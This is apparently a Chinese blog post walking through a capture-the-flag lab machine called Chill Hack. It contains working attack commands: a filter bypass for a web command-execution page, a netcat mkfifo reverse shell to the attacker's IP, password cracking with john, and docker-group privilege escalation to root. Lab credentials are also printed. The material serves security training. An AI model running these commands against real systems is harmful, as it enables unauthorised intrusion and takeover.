CTF之一次曲折获取Flag的过程

痛定思痛。 2022-10-17 00:43 300阅读 0赞

Hello各位朋友们，我是小杰，今天我们继续CTF之旅。

好，直接步入正题，先看看这次的题目描述。

![图片][89eff4fa8538ab4047d6d1566e5d954c.png]

通过题目描述，是有一个什么鬼机器人，能和世界进行交流巴拉巴拉![图片][5d3518c771f249f003c81fc4abedc1c4.png]......初步确定是需要获取两个Flag，题目的关键字是“枚举”。

好的，打开靶标系统~

![图片][4925aed96dd030fc95c42ab02282586d.png]

映入眼帘的就是这个CHILL HACK的字样，还有一个“骷髅头”。下边有一处登陆系统的地方。

很好，打开我们的“hack”机器——Kali2020。(这里为什么不用忍者系统一会儿说明。)

![图片][11da608cad2f654eb9aa330b02c0475b.png]

首先确定我们攻击机的IP地址：192.168.187.130

![图片][de3df558baa073e3604a9bb5d196c160.png]

进行网段扫描，确认靶机的IP为192.168.187.137

![图片][0f018412a4dd6a0198a9eedf5f8f3ac8.png]

可以看到靶机系统开放了21、22、80三个端口。

我们先访问80

瞅瞅~

![图片][0b865d22c854543c737cab1fc471420c.png]

![图片][09133ddbd00570b68f040b504c28011b.png]

界面花里胡哨的![图片][d11f2d877bebfd8a8173af4f70b2afd8.png]，随便浏览了几下发现是一个纯静态站点，搜索框什么的都是假的，似乎没什么好利用的。

接下来去看看21端口。

![图片][e94dbd8d889cd4e81ca673447ad5498e.png]

嗯，有一个txt文件，打开看看

![图片][ebed4e97d5bbd4fea9cb601c13290a22.png]

这里有一个叫“Apaar”的用户给了这么一句提示，大概意思说“Anurodh”用户说命令中会有一些过滤，可能和命令执行有关，这里先记下来，后面可能会用到

继续浏览没什么发现了，扫扫目录看看。

![图片][545ed8e2e1f448cbc38508070bea54c6.png]

这里看看有一个secret文件夹，我们去浏览器中查看一番。

是一个执行命令的地方。

结合我们之前得到的信息，命令执行会被过滤，这里应该就是让我们绕过拦截了。

先执行几下看看。

![图片][c2ad60ace10c2233fadadcbfc4183259.png]

执行ls、cat、less、more等等命令都会弹出"Are you a hacker?"

经过多次尝试，我发现执行tac可以绕过检测。

tac index.php

查看页面源代码

![图片][1df88121d9181e527194460922a8bd58.png]

果然是有过滤，这里的代码是把我们输入的命令按照空格间隔开，之后进行匹配，这里直接命令执行绕过getshell。

我这里使用nc进行getshell。

Kali进行监听。

> nc -lvp 6666

![图片][53417f7655cb800508ca14d86388ad6d.png]

靶机执行命令，反弹shell，

这里利用Linux下nc命令执行反弹shell的方式

> ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.187.130 6666 > /tmp/f

![图片][602122297fcfadd2b3ca1ce46f41142d.png]

![图片][d6a29837f69663abc0ee7d4bdb13b9d9.png]

nice![图片][f761215c7e50758fab40e1757886507f.png]，这里我们已经getshell，看看权限。

![图片][a858d330eb565288d018daf738c5943b.png]

我们获取的是用户www-data的权限，等级较低，

考虑到后续的操作，这里进行提权。

刚刚在网页中测试时，我们看到靶机上是装有python的，所以这里使用python进行提权。

> python3 -c "import pty;pty.spawn('/bin/bash')"

![图片][e5a8271063c8e89d1b28e59539929400.png]

ok，提权成功，接下来浏览浏览目录。看看能不能直接找到Flag![图片][9ef258e14fb9fac362d8ad1fd8b3a641.png]

Flag没找到，不过看到一个hacker.php的文件很可疑

![图片][214ed76266e9f4a6f43d186a31cb8409.png]

黑客：你竟然已经走到这一步了！看着这片黑暗，你将会找到答案.......（出题的作者中二病犯了![图片][085281d5f2104646470c4e571fccf7dd.png]，有我当年风范![图片][5ee35385a0f73746dd298644c8cd91e0.png]）啊哈哈哈....

<html>
    <head>
    <body>
    <style>
    body {
      background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif');
    }
    h2
    {
            color:red;
            font-weight: bold;
    }
    h1
    {
            color: yellow;
            font-weight: bold;
    }
    </style>
    <center>
            <img src = "images/hacker-with-laptop_23-2147985341.jpg"><br>
            <h1 style="background-color:red;">You have reached this far. </h2>
            <h1 style="background-color:black;">Look in the dark! You will find your answer</h1>
    </center>
    </head>
    </html>

代码中这个图片的名字叫法外加神神叨叨的这段话，估计是CTF中的隐写术了。

我淦！我不会隐写术啊![图片][2dedeca7527763f5efbff62def563df0.png]

![图片][a029cef90b281059afeb1e368e990db6.gif]

网上查了查资料，貌似有一款隐写的工具可以破解利用一下。

那就先下载到本地看看吧![图片][d56b45e38cfbd70066560aa99cc01391.png]。

在靶机利用python启动一个web服务器（在images目录下启动）

python3 -m http.server 8080

![图片][69f999716eaf45a11f4ad6699cebdb62.png]

在Kali上进行下载

wget http://192.168.187.137:8080/hacker-with-laptop_23-2147985341.jpg

![图片][03e24069f33ec6cb16301af87264e201.png]

这里用到的隐写破解工具是steghide

具体使用方法可以在官网查看http://steghide.sourceforge.net/

好，拿着工具干它一波![图片][498cba88a21ef0f600bba2dd70e3890b.png]

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

![图片][c60ebac6afdad2266e845fa771816601.png]

nice，提取出了图片中隐藏的压缩文件backup.zip

解压缩，发现需要解压密码......

![图片][c3dd1bb6be09a1101b1c02ff5362982b.png]

彳亍口巴，祭出神器——**开膛手约翰（john）**！

![图片][5d655c89e2329e382642af9970dae318.png]

john是Sectools排行榜上前十的密码破解工具，功能十分强大。

这里我也要顺便说一下为啥这次不用忍者的原因，忍者上没有集成john和steghide，再安装的话过于耗费时间，还有就是忍者需要的电脑资源实在是太大了，16G内存的我有点吃不消![图片][a5672bee124993761e52d7fcfb7b031d.png]

有的大佬会说hashcat也可以破解，忍者上是有hashcat的，不过我玩的不熟练，索性就直接kali一步到位了![图片][2dedeca7527763f5efbff62def563df0.png]

![图片][d60625b060abccf628f464f1b49b67a1.png]

好了，废话不多说，继续。

先生成hash文件。

> zip2john backup.zip > backup.hash

![图片][d54b88550c06998db7b49f34110a52f1.png]

john --wordlist=/usr/share/wordlists/rockyou.txt backup.hash
    john backup.hash --show

使用john加载本地字典进行破解，这里破解成功，显示密码为pass1word

![图片][71d58c23bc9b36e758b032ef778e7ff5.png]

接下来进行文件解压，查看解压的文件内容:

![图片][43ea1e07386949278091ee3a9c39a7cf.png]

<html>
    <head>
            Admin Portal
    </head>
            <title> Site Under Development ... </title>
            <body>
                    <form method="POST">
                            Username: <input type="text" name="name" placeholder="username"><br><br>
                            Email: <input type="email" name="email" placeholder="email"><br><br>
                            Password: <input type="password" name="password" placeholder="password">
                            <input type="submit" name="submit" value="Submit"> 
                    </form>
    <?php
            if(isset($_POST['submit']))
            {
                    $email = $_POST["email"];
                    $password = $_POST["password"];
                    if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
                    { 
                            $random = rand(1000,9999);?><br><br><br>
                            <form method="POST">
                                    Enter the OTP: <input type="number" name="otp">
                                    <input type="submit" name="submitOtp" value="Submit">
                            </form>
                    <?php   mail($email,"OTP for authentication",$random);
                            if(isset($_POST["submitOtp"]))
                                    {
                                            $otp = $_POST["otp"];
                                            if($otp == $random)
                                            {
                                                    echo "Welcome Anurodh!";
                                                    header("Location: authenticated.php");
                                            }
                                            else
                                            {
                                                    echo "Invalid OTP";
                                            }
                                    }
                    }
                    else
                    {
                            echo "Invalid Username or Password";
                    }
            }
    ?>
    </html>

阅读代码，看到一处使用base64加密的地方，解密看一下。

![图片][319da659d8f7175aa73907b6491d8efd.png]

解密得到密码

>  
> 
> !d0ntKn0wmYp@ssw0rd

![图片][f7218c4eecb3808710b9670a9787eda4.png]

登陆密码拿到手了，开始找账户进行登陆，最终在home目录下看到三个用户

![图片][68cca2e56390cdbe86de2f28a984f04e.png]

是不是很眼熟![图片][803146a16360b17edb8368319b4836b9.png]，前两个用户就是我们刚开始通过ftp获得到的那个文本文件中的两个用户。

拿着我们刚刚获取到的账号密码，尝试ssh登陆，经测试发现anurodh是可以登陆的。

ssh anurodh@192.168.187.137

![图片][8868cdbe20c0133bc67e8e4c16e4c148.png]

使用sudo -l查看sudo的权限，发现可以使用apaar身份执行一个脚本文件

sudo -l

![图片][4faeb3349e56e0f38c1dd8f46449629e.png]

继续~

apaar目录是可以进入的，不过里面的local.txt文件不可以读取

![图片][c13234dc1000c90013043b154e45c543.png]

查看执行权限，读取隐藏文件helpline.sh

![图片][e3cc4a922d5ce2eaf65e8d208e95bcfd.png]

观察发现，msg这个地方是存在命令执行的

我们可以切换到apaar身份去执行输出local.txt的内容

sudo -u apaar ./.helpline.sh

![图片][f0252659a5536e788a565b3f906158b9.png]

果不其然，拿到了第一个Flag![图片][bc2dda95f3f1648f116027f0182e3dac.png]

ok，继续。

查看anurodh用户信息

![图片][b8a55a0dc9d456fe1904b663d6f1004c.png]

发现有docker组

尝试列出本地镜像

docker images -a

![图片][daf15f2f32984061fe825236d7132be8.png]

既然有本地docker镜像，那就尝试docker提权

docker run -v /:/mnt  -it alpine

![图片][9f5f0c412b19f6ba59d49cd4b4561b9c.png]

提权成功，ok，继续搜索关键文件

![图片][ab3fa9ddbbeb439716072308583e8f80.png]

输出proof.txt

![图片][299269a6587f5e2067f5c555aa37caaa.png]

Ohhhhh~~~![图片][bc2dda95f3f1648f116027f0182e3dac.png]![图片][bc2dda95f3f1648f116027f0182e3dac.png]![图片][bc2dda95f3f1648f116027f0182e3dac.png]

![图片][75aef6454f2023aa3ccfed4d589c9e9f.png]

终于拿到了最终的Flag![图片][a5672bee124993761e52d7fcfb7b031d.png]

![图片][a24a5c44468b45e4c893ec7b4faf91ac.png]

小节：不容易![图片][824c281e6c990870ce1e69ed88ae7871.png]，搞了近十个小时，前期由于攻击平台的工具版本问题，好几处破解、提权的地方都莫名报错，从kali2017逐个版本硬是换到kali2020才逐步把问题解决。看了网上很多师傅的思路，也学习到了不少新姿势![图片][074816aa8eaa4247b37bcd2b325d4867.png]![图片][074816aa8eaa4247b37bcd2b325d4867.png]![图片][074816aa8eaa4247b37bcd2b325d4867.png]

[89eff4fa8538ab4047d6d1566e5d954c.png]: /images/20221014/69607b6e28ac4634935b1808c3dd6345.png
[5d3518c771f249f003c81fc4abedc1c4.png]: /images/20221014/48dab14c2f8247f99be7bb336f3c26c2.png
[4925aed96dd030fc95c42ab02282586d.png]: /images/20221014/afadfbcfa11443e6a5182288dd7967bc.png
[11da608cad2f654eb9aa330b02c0475b.png]: /images/20221014/0dbdb1765a4540d7a9e58a4275a4b450.png
[de3df558baa073e3604a9bb5d196c160.png]: /images/20221014/5196eca6d97b45728cd8194d44b8a72b.png
[0f018412a4dd6a0198a9eedf5f8f3ac8.png]: /images/20221014/e41297fc8fb9414a834383eed640d1c9.png
[0b865d22c854543c737cab1fc471420c.png]: /images/20221014/a13fc8961e0447deaae5afde3d7b6367.png
[09133ddbd00570b68f040b504c28011b.png]: /images/20221014/386e766f1e014778a28d2851e45db899.png
[d11f2d877bebfd8a8173af4f70b2afd8.png]: /images/20221014/248baba8917b4fb390048b1eca2c6988.png
[e94dbd8d889cd4e81ca673447ad5498e.png]: /images/20221014/d61fd2881ff944c79a9371cd9f384196.png
[ebed4e97d5bbd4fea9cb601c13290a22.png]: /images/20221014/5ae70d0199354cc484f40d1e25b64f77.png
[545ed8e2e1f448cbc38508070bea54c6.png]: /images/20221014/0f286b9c915f4c11850893ff08605b45.png
[c2ad60ace10c2233fadadcbfc4183259.png]: /images/20221014/fc9c357bceb94cefbe40dfc8ec82a8aa.png
[1df88121d9181e527194460922a8bd58.png]: /images/20221014/14c4c2795121493cb6cae482ccf6d9e0.png
[53417f7655cb800508ca14d86388ad6d.png]: /images/20221014/e576fa40fce648ada5a8772806fac00d.png
[602122297fcfadd2b3ca1ce46f41142d.png]: /images/20221014/989414a5264c4fb0bded218b72455477.png
[d6a29837f69663abc0ee7d4bdb13b9d9.png]: /images/20221014/fa453c95312d43ef9efadf21c7c384bb.png
[f761215c7e50758fab40e1757886507f.png]: /images/20221014/027867dea1454831b78d3a3915c3f2ea.png
[a858d330eb565288d018daf738c5943b.png]: /images/20221014/f1105662ce77485c9904b9bc3bc58c9a.png
[e5a8271063c8e89d1b28e59539929400.png]: /images/20221014/b66262f51f6e498985c3b2de019d1c88.png
[9ef258e14fb9fac362d8ad1fd8b3a641.png]: /images/20221014/dfe42793bd5d4ec791e06f646f0d4955.png
[214ed76266e9f4a6f43d186a31cb8409.png]: /images/20221014/17562e7f59154812988b55335107cfaf.png
[085281d5f2104646470c4e571fccf7dd.png]: https://img-blog.csdnimg.cn/img_convert/085281d5f2104646470c4e571fccf7dd.png
[5ee35385a0f73746dd298644c8cd91e0.png]: /images/20221014/709b746058724fcfa149775b8b31592f.png
[2dedeca7527763f5efbff62def563df0.png]: /images/20221014/525dbeabf7024f29b3a8575b6126068e.png
[a029cef90b281059afeb1e368e990db6.gif]: /images/20221014/0fdabbc25b854a05a0db0016a230898b.png
[d56b45e38cfbd70066560aa99cc01391.png]: /images/20221014/9ac8b6c2e3de49f6972977cb01eb164e.png
[69f999716eaf45a11f4ad6699cebdb62.png]: /images/20221014/d01ca9918a064bf996dd8d0d0e76f15f.png
[03e24069f33ec6cb16301af87264e201.png]: /images/20221014/19fad0a0c17447a9a87ad9c024f57090.png
[498cba88a21ef0f600bba2dd70e3890b.png]: /images/20221014/3f1f398e7f5b4433a25694697e9cfcee.png
[c60ebac6afdad2266e845fa771816601.png]: /images/20221014/9f4c9f17904541199010809938fee161.png
[c3dd1bb6be09a1101b1c02ff5362982b.png]: /images/20221014/669fa8dc2b57422a9e2a5ea2809ea4e2.png
[5d655c89e2329e382642af9970dae318.png]: /images/20221014/4d80c304e02d4249a00c440806050f92.png
[a5672bee124993761e52d7fcfb7b031d.png]: /images/20221014/e516baf7b6bb402aaa033576947b62c0.png
[d60625b060abccf628f464f1b49b67a1.png]: /images/20221014/48a920704c784eaead5c8718b0864d66.png
[d54b88550c06998db7b49f34110a52f1.png]: /images/20221014/a4a154b7919e406aa383524fabdf272c.png
[71d58c23bc9b36e758b032ef778e7ff5.png]: /images/20221014/8fd7dbadecd647e993d1a07ab469b171.png
[43ea1e07386949278091ee3a9c39a7cf.png]: /images/20221014/63763fc5077d41a286aaaf5cceb7c444.png
[319da659d8f7175aa73907b6491d8efd.png]: /images/20221014/77d0604c8eb54999a3b111f73b00b68f.png
[f7218c4eecb3808710b9670a9787eda4.png]: /images/20221014/80790f95e1e6430989076ad85e5a370a.png
[68cca2e56390cdbe86de2f28a984f04e.png]: /images/20221014/d3804ee6f80e4e62a86e79b1de39d9a2.png
[803146a16360b17edb8368319b4836b9.png]: /images/20221014/581a720bac40477dbbf57f09038a3ffb.png
[8868cdbe20c0133bc67e8e4c16e4c148.png]: /images/20221014/6850fbcc3b034cee98015d0d27e749aa.png
[4faeb3349e56e0f38c1dd8f46449629e.png]: /images/20221014/49b1732c1ef9437e991da6f5c33cc306.png
[c13234dc1000c90013043b154e45c543.png]: /images/20221014/a01d06de819e49308547c8568068a900.png
[e3cc4a922d5ce2eaf65e8d208e95bcfd.png]: /images/20221014/6145003c6f984b6ca64bfe1359acb06b.png
[f0252659a5536e788a565b3f906158b9.png]: /images/20221014/9aeb871a369047d2ba77b364672e5371.png
[bc2dda95f3f1648f116027f0182e3dac.png]: /images/20221014/581f3ab91ffc418f951c6e87fe0768b3.png
[b8a55a0dc9d456fe1904b663d6f1004c.png]: /images/20221014/65f32c32bed34024b76546bf616462de.png
[daf15f2f32984061fe825236d7132be8.png]: /images/20221014/0ee36e3904d2403e82ac7953548d739a.png
[9f5f0c412b19f6ba59d49cd4b4561b9c.png]: /images/20221014/0166d68d35924a0db37643dbe40337ef.png
[ab3fa9ddbbeb439716072308583e8f80.png]: /images/20221014/2099561e453b48f9b19c9b83a0bfe77f.png
[299269a6587f5e2067f5c555aa37caaa.png]: /images/20221014/3029eac7dd0848138e47f726d107137c.png
[75aef6454f2023aa3ccfed4d589c9e9f.png]: /images/20221014/5571ed81272c40eea3db63db4d7cae38.png
[a24a5c44468b45e4c893ec7b4faf91ac.png]: /images/20221014/79f354ced1564fb88bf4177dcf873d40.png
[824c281e6c990870ce1e69ed88ae7871.png]: https://img-blog.csdnimg.cn/img_convert/824c281e6c990870ce1e69ed88ae7871.png
[074816aa8eaa4247b37bcd2b325d4867.png]: /images/20221014/2fa269ee6cb746b0b557dd5b65dbffda.png